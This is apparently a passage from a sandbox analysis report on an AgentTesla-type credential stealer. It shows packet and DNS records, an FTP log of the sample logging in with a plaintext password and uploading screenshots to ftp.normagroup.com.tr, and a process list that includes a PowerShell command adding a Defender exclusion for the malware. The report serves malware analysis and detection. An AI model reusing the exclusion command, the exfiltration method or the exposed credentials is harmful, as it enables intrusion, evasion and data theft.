                                      Oct 3, 2024 09:15:01.157099009 CEST6167349764104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:01.157532930 CEST4976461673192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:15:01.625895977 CEST2149746104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:01.668257952 CEST4974621192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:15:16.163206100 CEST4974621192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:15:16.168112040 CEST2149746104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:16.381231070 CEST2149746104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:16.381647110 CEST4976553275192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:15:16.386538982 CEST5327549765104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:16.386603117 CEST4976553275192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:15:16.386667967 CEST4974621192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:15:16.391504049 CEST2149746104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:17.010523081 CEST2149746104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:17.010890007 CEST4976553275192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:15:17.016442060 CEST5327549765104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:17.016454935 CEST5327549765104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:17.016463995 CEST5327549765104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:17.016472101 CEST5327549765104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:17.016480923 CEST5327549765104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:17.016556025 CEST4976553275192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:15:17.016572952 CEST5327549765104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:17.016582966 CEST5327549765104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:17.016591072 CEST5327549765104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:17.016653061 CEST4976553275192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:15:17.016726017 CEST5327549765104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:17.016735077 CEST5327549765104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:17.017314911 CEST4976553275192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:15:17.022072077 CEST5327549765104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:17.022085905 CEST5327549765104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:17.022094965 CEST5327549765104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:17.022150040 CEST5327549765104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:17.022151947 CEST4976553275192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:15:17.022183895 CEST5327549765104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:17.022193909 CEST5327549765104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:17.022206068 CEST5327549765104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:17.022216082 CEST5327549765104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:17.022223949 CEST5327549765104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:17.022253990 CEST4976553275192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:15:17.022317886 CEST4976553275192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:15:17.022408009 CEST5327549765104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:17.022418022 CEST5327549765104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:17.022469044 CEST4976553275192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:15:17.022842884 CEST5327549765104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:17.025597095 CEST4976553275192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:15:17.027589083 CEST5327549765104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:17.027601004 CEST5327549765104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:17.027688980 CEST5327549765104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:17.027770996 CEST4976553275192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:15:17.027831078 CEST5327549765104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:17.027908087 CEST5327549765104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:17.027910948 CEST4976553275192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:15:17.027921915 CEST5327549765104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:17.027931929 CEST5327549765104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:17.027940989 CEST5327549765104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:17.027949095 CEST5327549765104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:17.027978897 CEST4976553275192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:15:17.028139114 CEST5327549765104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:17.031164885 CEST5327549765104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:17.032661915 CEST5327549765104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:17.032674074 CEST5327549765104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:17.032778025 CEST5327549765104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:17.032787085 CEST5327549765104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:17.032797098 CEST5327549765104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:17.032814026 CEST5327549765104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:17.032856941 CEST5327549765104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:17.032865047 CEST5327549765104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:17.032902002 CEST5327549765104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:17.033145905 CEST5327549765104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:17.033214092 CEST4976553275192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:15:17.059159994 CEST4974621192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:15:17.500665903 CEST2149746104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:17.543226957 CEST4974621192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:15:23.113631964 CEST4974621192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:15:23.118467093 CEST2149746104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:23.331587076 CEST2149746104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:23.331955910 CEST4976651305192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:15:23.336941957 CEST5130549766104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:23.337120056 CEST4976651305192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:15:23.337208033 CEST4974621192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:15:23.342011929 CEST2149746104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:23.972349882 CEST2149746104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:23.972625971 CEST4976651305192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:15:23.977689981 CEST5130549766104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:23.977703094 CEST5130549766104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:23.977724075 CEST5130549766104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:23.977745056 CEST5130549766104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:23.977768898 CEST4976651305192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:15:23.977792025 CEST5130549766104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:23.977792978 CEST4976651305192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:15:23.977823973 CEST5130549766104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:23.977830887 CEST4976651305192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:15:23.977857113 CEST4976651305192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:15:23.977876902 CEST5130549766104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:23.977888107 CEST5130549766104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:23.977935076 CEST4976651305192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:15:23.977943897 CEST5130549766104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:23.977955103 CEST5130549766104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:23.978009939 CEST4976651305192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:15:23.982712984 CEST5130549766104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:23.982723951 CEST5130549766104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:23.982736111 CEST5130549766104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:23.982765913 CEST5130549766104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:23.982783079 CEST4976651305192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:15:23.982817888 CEST5130549766104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:23.982841015 CEST5130549766104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:23.982858896 CEST4976651305192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:15:23.982882977 CEST4976651305192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:15:23.982898951 CEST4976651305192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:15:23.982992887 CEST5130549766104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:23.983100891 CEST4976651305192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:15:23.987796068 CEST5130549766104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:23.987940073 CEST5130549766104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:23.988081932 CEST5130549766104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:23.988214016 CEST5130549766104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:23.988228083 CEST5130549766104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:23.988261938 CEST5130549766104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:23.988310099 CEST5130549766104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:23.988373041 CEST5130549766104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:23.988405943 CEST5130549766104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:23.988478899 CEST5130549766104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:23.988491058 CEST5130549766104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:23.988514900 CEST5130549766104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:23.988526106 CEST5130549766104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:23.988626003 CEST5130549766104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:23.988636971 CEST5130549766104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:23.988687992 CEST5130549766104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:23.988698959 CEST5130549766104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:23.989156961 CEST5130549766104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:23.989217043 CEST4976651305192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:15:24.027604103 CEST4974621192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:15:24.436398029 CEST2149746104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:24.480710030 CEST4974621192.168.2.5104.247.165.99

                                      UDP Packets

                                      TimestampSource PortDest PortSource IPDest IP
                                      Oct 3, 2024 09:12:54.449807882 CEST6543453192.168.2.51.1.1.1
                                      Oct 3, 2024 09:12:54.910888910 CEST53654341.1.1.1192.168.2.5

                                      DNS Queries

                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                      Oct 3, 2024 09:12:54.449807882 CEST192.168.2.51.1.1.10x3a74Standard query (0)ftp.normagroup.com.trA (IP address)IN (0x0001)false

                                      DNS Answers

                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                      Oct 3, 2024 09:12:54.910888910 CEST1.1.1.1192.168.2.50x3a74No error (0)ftp.normagroup.com.tr104.247.165.99A (IP address)IN (0x0001)false

                                      FTP Packets

                                      TimestampSource PortDest PortSource IPDest IPCommands
                                      Oct 3, 2024 09:13:07.003036976 CEST2149746104.247.165.99192.168.2.5220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                                      220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 50 allowed.
                                      220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 50 allowed.220-Local time is now 10:13. Server port: 21.
                                      220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 50 allowed.220-Local time is now 10:13. Server port: 21.220-This is a private system - No anonymous login
                                      220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 50 allowed.220-Local time is now 10:13. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.
                                      220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 50 allowed.220-Local time is now 10:13. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
                                      Oct 3, 2024 09:13:07.006419897 CEST4974621192.168.2.5104.247.165.99USER admin@normagroup.com.tr
                                      Oct 3, 2024 09:13:07.225270033 CEST2149746104.247.165.99192.168.2.5331 User admin@normagroup.com.tr OK. Password required
                                      Oct 3, 2024 09:13:07.225553989 CEST4974621192.168.2.5104.247.165.99PASS Qb.X[.j.Yfm[
                                      Oct 3, 2024 09:13:07.470572948 CEST2149746104.247.165.99192.168.2.5230 OK. Current restricted directory is /
                                      Oct 3, 2024 09:13:07.689306974 CEST2149746104.247.165.99192.168.2.5504 Unknown command
                                      Oct 3, 2024 09:13:07.689443111 CEST4974621192.168.2.5104.247.165.99PWD
                                      Oct 3, 2024 09:13:07.906965971 CEST2149746104.247.165.99192.168.2.5257 "/" is your current location
                                      Oct 3, 2024 09:13:07.907135963 CEST4974621192.168.2.5104.247.165.99TYPE I
                                      Oct 3, 2024 09:13:08.124313116 CEST2149746104.247.165.99192.168.2.5200 TYPE is now 8-bit binary
                                      Oct 3, 2024 09:13:08.124536991 CEST4974621192.168.2.5104.247.165.99PASV
                                      Oct 3, 2024 09:13:08.341923952 CEST2149746104.247.165.99192.168.2.5227 Entering Passive Mode (104,247,165,99,234,7)
                                      Oct 3, 2024 09:13:08.352312088 CEST4974621192.168.2.5104.247.165.99STOR SC_user-048707_2024_11_23_23_03_22.jpeg
                                      Oct 3, 2024 09:13:08.962277889 CEST2149746104.247.165.99192.168.2.5150 Accepted data connection
                                      Oct 3, 2024 09:13:09.442370892 CEST2149746104.247.165.99192.168.2.5226-File successfully transferred
                                      226-File successfully transferred226 0.480 seconds (measured here), 154.75 Kbytes per second
                                      Oct 3, 2024 09:13:20.583569050 CEST4974621192.168.2.5104.247.165.99PASV
                                      Oct 3, 2024 09:13:20.801656008 CEST2149746104.247.165.99192.168.2.5227 Entering Passive Mode (104,247,165,99,198,85)
                                      Oct 3, 2024 09:13:20.807755947 CEST4974621192.168.2.5104.247.165.99STOR SC_user-048707_2024_12_02_05_42_19.jpeg
                                      Oct 3, 2024 09:13:21.431574106 CEST2149746104.247.165.99192.168.2.5150 Accepted data connection
                                      Oct 3, 2024 09:13:21.923731089 CEST2149746104.247.165.99192.168.2.5226-File successfully transferred
                                      226-File successfully transferred226 0.491 seconds (measured here), 151.58 Kbytes per second
                                      Oct 3, 2024 09:13:25.048399925 CEST4974621192.168.2.5104.247.165.99PASV
                                      Oct 3, 2024 09:13:25.266415119 CEST2149746104.247.165.99192.168.2.5227 Entering Passive Mode (104,247,165,99,235,22)
                                      Oct 3, 2024 09:13:25.271961927 CEST4974621192.168.2.5104.247.165.99STOR SC_user-048707_2024_12_06_10_03_08.jpeg
                                      Oct 3, 2024 09:13:25.932480097 CEST2149746104.247.165.99192.168.2.5150 Accepted data connection
                                      Oct 3, 2024 09:13:26.427440882 CEST2149746104.247.165.99192.168.2.5226-File successfully transferred
                                      226-File successfully transferred226 0.495 seconds (measured here), 156.22 Kbytes per second
                                      Oct 3, 2024 09:13:27.314317942 CEST4974621192.168.2.5104.247.165.99PASV
                                      Oct 3, 2024 09:13:27.532078981 CEST2149746104.247.165.99192.168.2.5227 Entering Passive Mode (104,247,165,99,194,80)
                                      Oct 3, 2024 09:13:27.537539005 CEST4974621192.168.2.5104.247.165.99STOR SC_user-048707_2024_12_09_12_31_02.jpeg
                                      Oct 3, 2024 09:13:28.134341002 CEST2149746104.247.165.99192.168.2.5150 Accepted data connection
                                      Oct 3, 2024 09:13:28.594593048 CEST2149746104.247.165.99192.168.2.5226-File successfully transferred
                                      226-File successfully transferred226 0.459 seconds (measured here), 161.84 Kbytes per second
                                      Oct 3, 2024 09:13:33.282485962 CEST4974621192.168.2.5104.247.165.99PASV
                                      Oct 3, 2024 09:13:33.653872013 CEST2149746104.247.165.99192.168.2.5227 Entering Passive Mode (104,247,165,99,234,87)
                                      Oct 3, 2024 09:13:33.662830114 CEST4974621192.168.2.5104.247.165.99STOR SC_user-048707_2024_12_14_07_10_21.jpeg
                                      Oct 3, 2024 09:13:34.317076921 CEST2149746104.247.165.99192.168.2.5150 Accepted data connection
                                      Oct 3, 2024 09:13:34.809006929 CEST2149746104.247.165.99192.168.2.5226-File successfully transferred
                                      226-File successfully transferred226 0.495 seconds (measured here), 149.96 Kbytes per second
                                      Oct 3, 2024 09:13:35.776626110 CEST4974621192.168.2.5104.247.165.99PASV
                                      Oct 3, 2024 09:13:36.041918039 CEST2149746104.247.165.99192.168.2.5227 Entering Passive Mode (104,247,165,99,239,250)
                                      Oct 3, 2024 09:13:36.057435036 CEST4974621192.168.2.5104.247.165.99STOR SC_user-048707_2024_12_17_13_36_38.jpeg
                                      Oct 3, 2024 09:13:36.617619991 CEST2149754104.247.165.99192.168.2.5220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                                      220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 4 of 50 allowed.
                                      220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 4 of 50 allowed.220-Local time is now 10:13. Server port: 21.
                                      220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 4 of 50 allowed.220-Local time is now 10:13. Server port: 21.220-This is a private system - No anonymous login
                                      220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 4 of 50 allowed.220-Local time is now 10:13. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.
                                      220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 4 of 50 allowed.220-Local time is now 10:13. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
                                      Oct 3, 2024 09:13:36.618010998 CEST4975421192.168.2.5104.247.165.99USER admin@normagroup.com.tr
                                      Oct 3, 2024 09:13:36.690882921 CEST2149746104.247.165.99192.168.2.5150 Accepted data connection
                                      Oct 3, 2024 09:13:36.852281094 CEST2149754104.247.165.99192.168.2.5331 User admin@normagroup.com.tr OK. Password required
                                      Oct 3, 2024 09:13:36.853719950 CEST4975421192.168.2.5104.247.165.99PASS Qb.X[.j.Yfm[
                                      Oct 3, 2024 09:13:37.130883932 CEST2149754104.247.165.99192.168.2.5230 OK. Current restricted directory is /
                                      Oct 3, 2024 09:13:37.178802013 CEST2149746104.247.165.99192.168.2.5226-File successfully transferred
                                      226-File successfully transferred226 0.500 seconds (measured here), 148.48 Kbytes per second
                                      Oct 3, 2024 09:13:37.220681906 CEST4974621192.168.2.5104.247.165.99PASV
                                      Oct 3, 2024 09:13:37.358197927 CEST2149754104.247.165.99192.168.2.5504 Unknown command
                                      Oct 3, 2024 09:13:37.358360052 CEST4975421192.168.2.5104.247.165.99PWD
                                      Oct 3, 2024 09:13:37.438071966 CEST2149746104.247.165.99192.168.2.5227 Entering Passive Mode (104,247,165,99,243,217)
                                      Oct 3, 2024 09:13:37.443713903 CEST4974621192.168.2.5104.247.165.99STOR SC_user-048707_2024_12_22_13_44_07.jpeg
                                      Oct 3, 2024 09:13:37.591453075 CEST2149754104.247.165.99192.168.2.5257 "/" is your current location
                                      Oct 3, 2024 09:13:37.591599941 CEST4975421192.168.2.5104.247.165.99TYPE I
                                      Oct 3, 2024 09:13:37.815694094 CEST2149754104.247.165.99192.168.2.5200 TYPE is now 8-bit binary
                                      Oct 3, 2024 09:13:37.820837021 CEST4975421192.168.2.5104.247.165.99PASV
                                      Oct 3, 2024 09:13:38.044735909 CEST2149754104.247.165.99192.168.2.5227 Entering Passive Mode (104,247,165,99,226,81)
                                      Oct 3, 2024 09:13:38.048470974 CEST2149746104.247.165.99192.168.2.5150 Accepted data connection
                                      Oct 3, 2024 09:13:38.050405979 CEST4975421192.168.2.5104.247.165.99STOR SC_user-048707_2024_12_19_18_11_34.jpeg
                                      Oct 3, 2024 09:13:38.511678934 CEST2149746104.247.165.99192.168.2.5226-File successfully transferred
                                      226-File successfully transferred226 0.463 seconds (measured here), 160.46 Kbytes per second
                                      Oct 3, 2024 09:13:38.673893929 CEST2149754104.247.165.99192.168.2.5150 Accepted data connection
                                      Oct 3, 2024 09:13:39.148711920 CEST2149754104.247.165.99192.168.2.5226-File successfully transferred
                                      226-File successfully transferred226 0.475 seconds (measured here), 156.23 Kbytes per second
                                      Oct 3, 2024 09:14:16.077177048 CEST4974621192.168.2.5104.247.165.99PASV
                                      Oct 3, 2024 09:14:16.295043945 CEST2149746104.247.165.99192.168.2.5227 Entering Passive Mode (104,247,165,99,194,110)
                                      Oct 3, 2024 09:14:16.300910950 CEST4974621192.168.2.5104.247.165.99STOR SC_user-048707_2025_01_14_13_06_30.jpeg
                                      Oct 3, 2024 09:14:16.914484978 CEST2149746104.247.165.99192.168.2.5150 Accepted data connection
                                      Oct 3, 2024 09:14:17.397356033 CEST2149746104.247.165.99192.168.2.5226-File successfully transferred
                                      226-File successfully transferred226 0.483 seconds (measured here), 153.78 Kbytes per second
                                      Oct 3, 2024 09:14:40.035689116 CEST4974621192.168.2.5104.247.165.99PASV
                                      Oct 3, 2024 09:14:40.258549929 CEST2149746104.247.165.99192.168.2.5227 Entering Passive Mode (104,247,165,99,210,222)
                                      Oct 3, 2024 09:14:40.278170109 CEST4974621192.168.2.5104.247.165.99STOR SC_user-048707_2025_01_26_19_47_34.jpeg
                                      Oct 3, 2024 09:14:40.957122087 CEST2149746104.247.165.99192.168.2.5150 Accepted data connection
                                      Oct 3, 2024 09:14:41.446665049 CEST2149746104.247.165.99192.168.2.5226-File successfully transferred
                                      226-File successfully transferred226 0.489 seconds (measured here), 151.74 Kbytes per second
                                      Oct 3, 2024 09:14:50.766452074 CEST4974621192.168.2.5104.247.165.99PASV
                                      Oct 3, 2024 09:14:51.002279043 CEST2149746104.247.165.99192.168.2.5227 Entering Passive Mode (104,247,165,99,212,126)
                                      Oct 3, 2024 09:14:51.018516064 CEST4974621192.168.2.5104.247.165.99STOR SC_user-048707_2025_02_02_14_08_50.jpeg
                                      Oct 3, 2024 09:14:51.643819094 CEST2149746104.247.165.99192.168.2.5150 Accepted data connection
                                      Oct 3, 2024 09:14:52.128356934 CEST2149746104.247.165.99192.168.2.5226-File successfully transferred
                                      226-File successfully transferred226 0.484 seconds (measured here), 153.54 Kbytes per second
                                      Oct 3, 2024 09:14:59.723114014 CEST4974621192.168.2.5104.247.165.99PASV
                                      Oct 3, 2024 09:14:59.940615892 CEST2149746104.247.165.99192.168.2.5227 Entering Passive Mode (104,247,165,99,240,233)
                                      Oct 3, 2024 09:14:59.946182013 CEST4974621192.168.2.5104.247.165.99STOR SC_user-048707_2025_02_08_11_53_49.jpeg
                                      Oct 3, 2024 09:15:01.139504910 CEST2149746104.247.165.99192.168.2.5150 Accepted data connection
                                      Oct 3, 2024 09:15:01.139533997 CEST2149746104.247.165.99192.168.2.5150 Accepted data connection
                                      Oct 3, 2024 09:15:01.139715910 CEST2149746104.247.165.99192.168.2.5150 Accepted data connection
                                      Oct 3, 2024 09:15:01.625895977 CEST2149746104.247.165.99192.168.2.5226-File successfully transferred
                                      226-File successfully transferred226 1.058 seconds (measured here), 70.18 Kbytes per second
                                      Oct 3, 2024 09:15:16.163206100 CEST4974621192.168.2.5104.247.165.99PASV
                                      Oct 3, 2024 09:15:16.381231070 CEST2149746104.247.165.99192.168.2.5227 Entering Passive Mode (104,247,165,99,208,27)
                                      Oct 3, 2024 09:15:16.386667967 CEST4974621192.168.2.5104.247.165.99STOR SC_user-048707_2025_02_22_16_38_31.jpeg
                                      Oct 3, 2024 09:15:17.010523081 CEST2149746104.247.165.99192.168.2.5150 Accepted data connection
                                      Oct 3, 2024 09:15:17.500665903 CEST2149746104.247.165.99192.168.2.5226-File successfully transferred
                                      226-File successfully transferred226 0.491 seconds (measured here), 151.06 Kbytes per second
                                      Oct 3, 2024 09:15:23.113631964 CEST4974621192.168.2.5104.247.165.99PASV
                                      Oct 3, 2024 09:15:23.331587076 CEST2149746104.247.165.99192.168.2.5227 Entering Passive Mode (104,247,165,99,200,105)
                                      Oct 3, 2024 09:15:23.337208033 CEST4974621192.168.2.5104.247.165.99STOR SC_user-048707_2024_10_03_03_15_22.jpeg
                                      Oct 3, 2024 09:15:23.972349882 CEST2149746104.247.165.99192.168.2.5150 Accepted data connection
                                      Oct 3, 2024 09:15:24.436398029 CEST2149746104.247.165.99192.168.2.5226-File successfully transferred
                                      226-File successfully transferred226 0.465 seconds (measured here), 159.78 Kbytes per second

                                      Statistics

                                      CPU Usage

                                      Click to jump to process

                                      Memory Usage

                                      Click to jump to process

                                      High Level Behavior Distribution

                                      Click to dive into process behavior distribution

                                      Behavior

                                      Click to jump to process

                                      System Behavior

                                      General

                                      Target ID:0
                                      Start time:03:11:13
                                      Start date:03/10/2024
                                      Path:C:\Users\user\Desktop\hesaphareketi__20241001.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\Desktop\hesaphareketi__20241001.exe"
                                      Imagebase:0xcb0000
                                      File size:716'800 bytes
                                      MD5 hash:5EAAFECA7053687B46ECFFAD93C82418
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2149976039.00000000048DA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.2149976039.00000000048DA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      Reputation:low
                                      Has exited:true

                                      General

                                      Target ID:3
                                      Start time:03:11:14
                                      Start date:03/10/2024
                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\hesaphareketi__20241001.exe"
                                      Imagebase:0xf30000
                                      File size:433'152 bytes
                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      General

                                      Target ID:4
                                      Start time:03:11:14
                                      Start date:03/10/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6d64d0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      General

                                      Target ID:5
                                      Start time:03:11:14
                                      Start date:03/10/2024
                                      Path:C:\Users\user\Desktop\hesaphareketi__20241001.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\Desktop\hesaphareketi__20241001.exe"
                                      Imagebase:0x990000
                                      File size:716'800 bytes
                                      MD5 hash:5EAAFECA7053687B46ECFFAD93C82418
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.4608159738.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.4608159738.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.4610095898.0000000002D71000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      Reputation:low
                                      Has exited:false

                                      General

                                      Target ID:6
                                      Start time:03:11:18
                                      Start date:03/10/2024
                                      Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                      Imagebase:0x7ff6ef0c0000
                                      File size:496'640 bytes
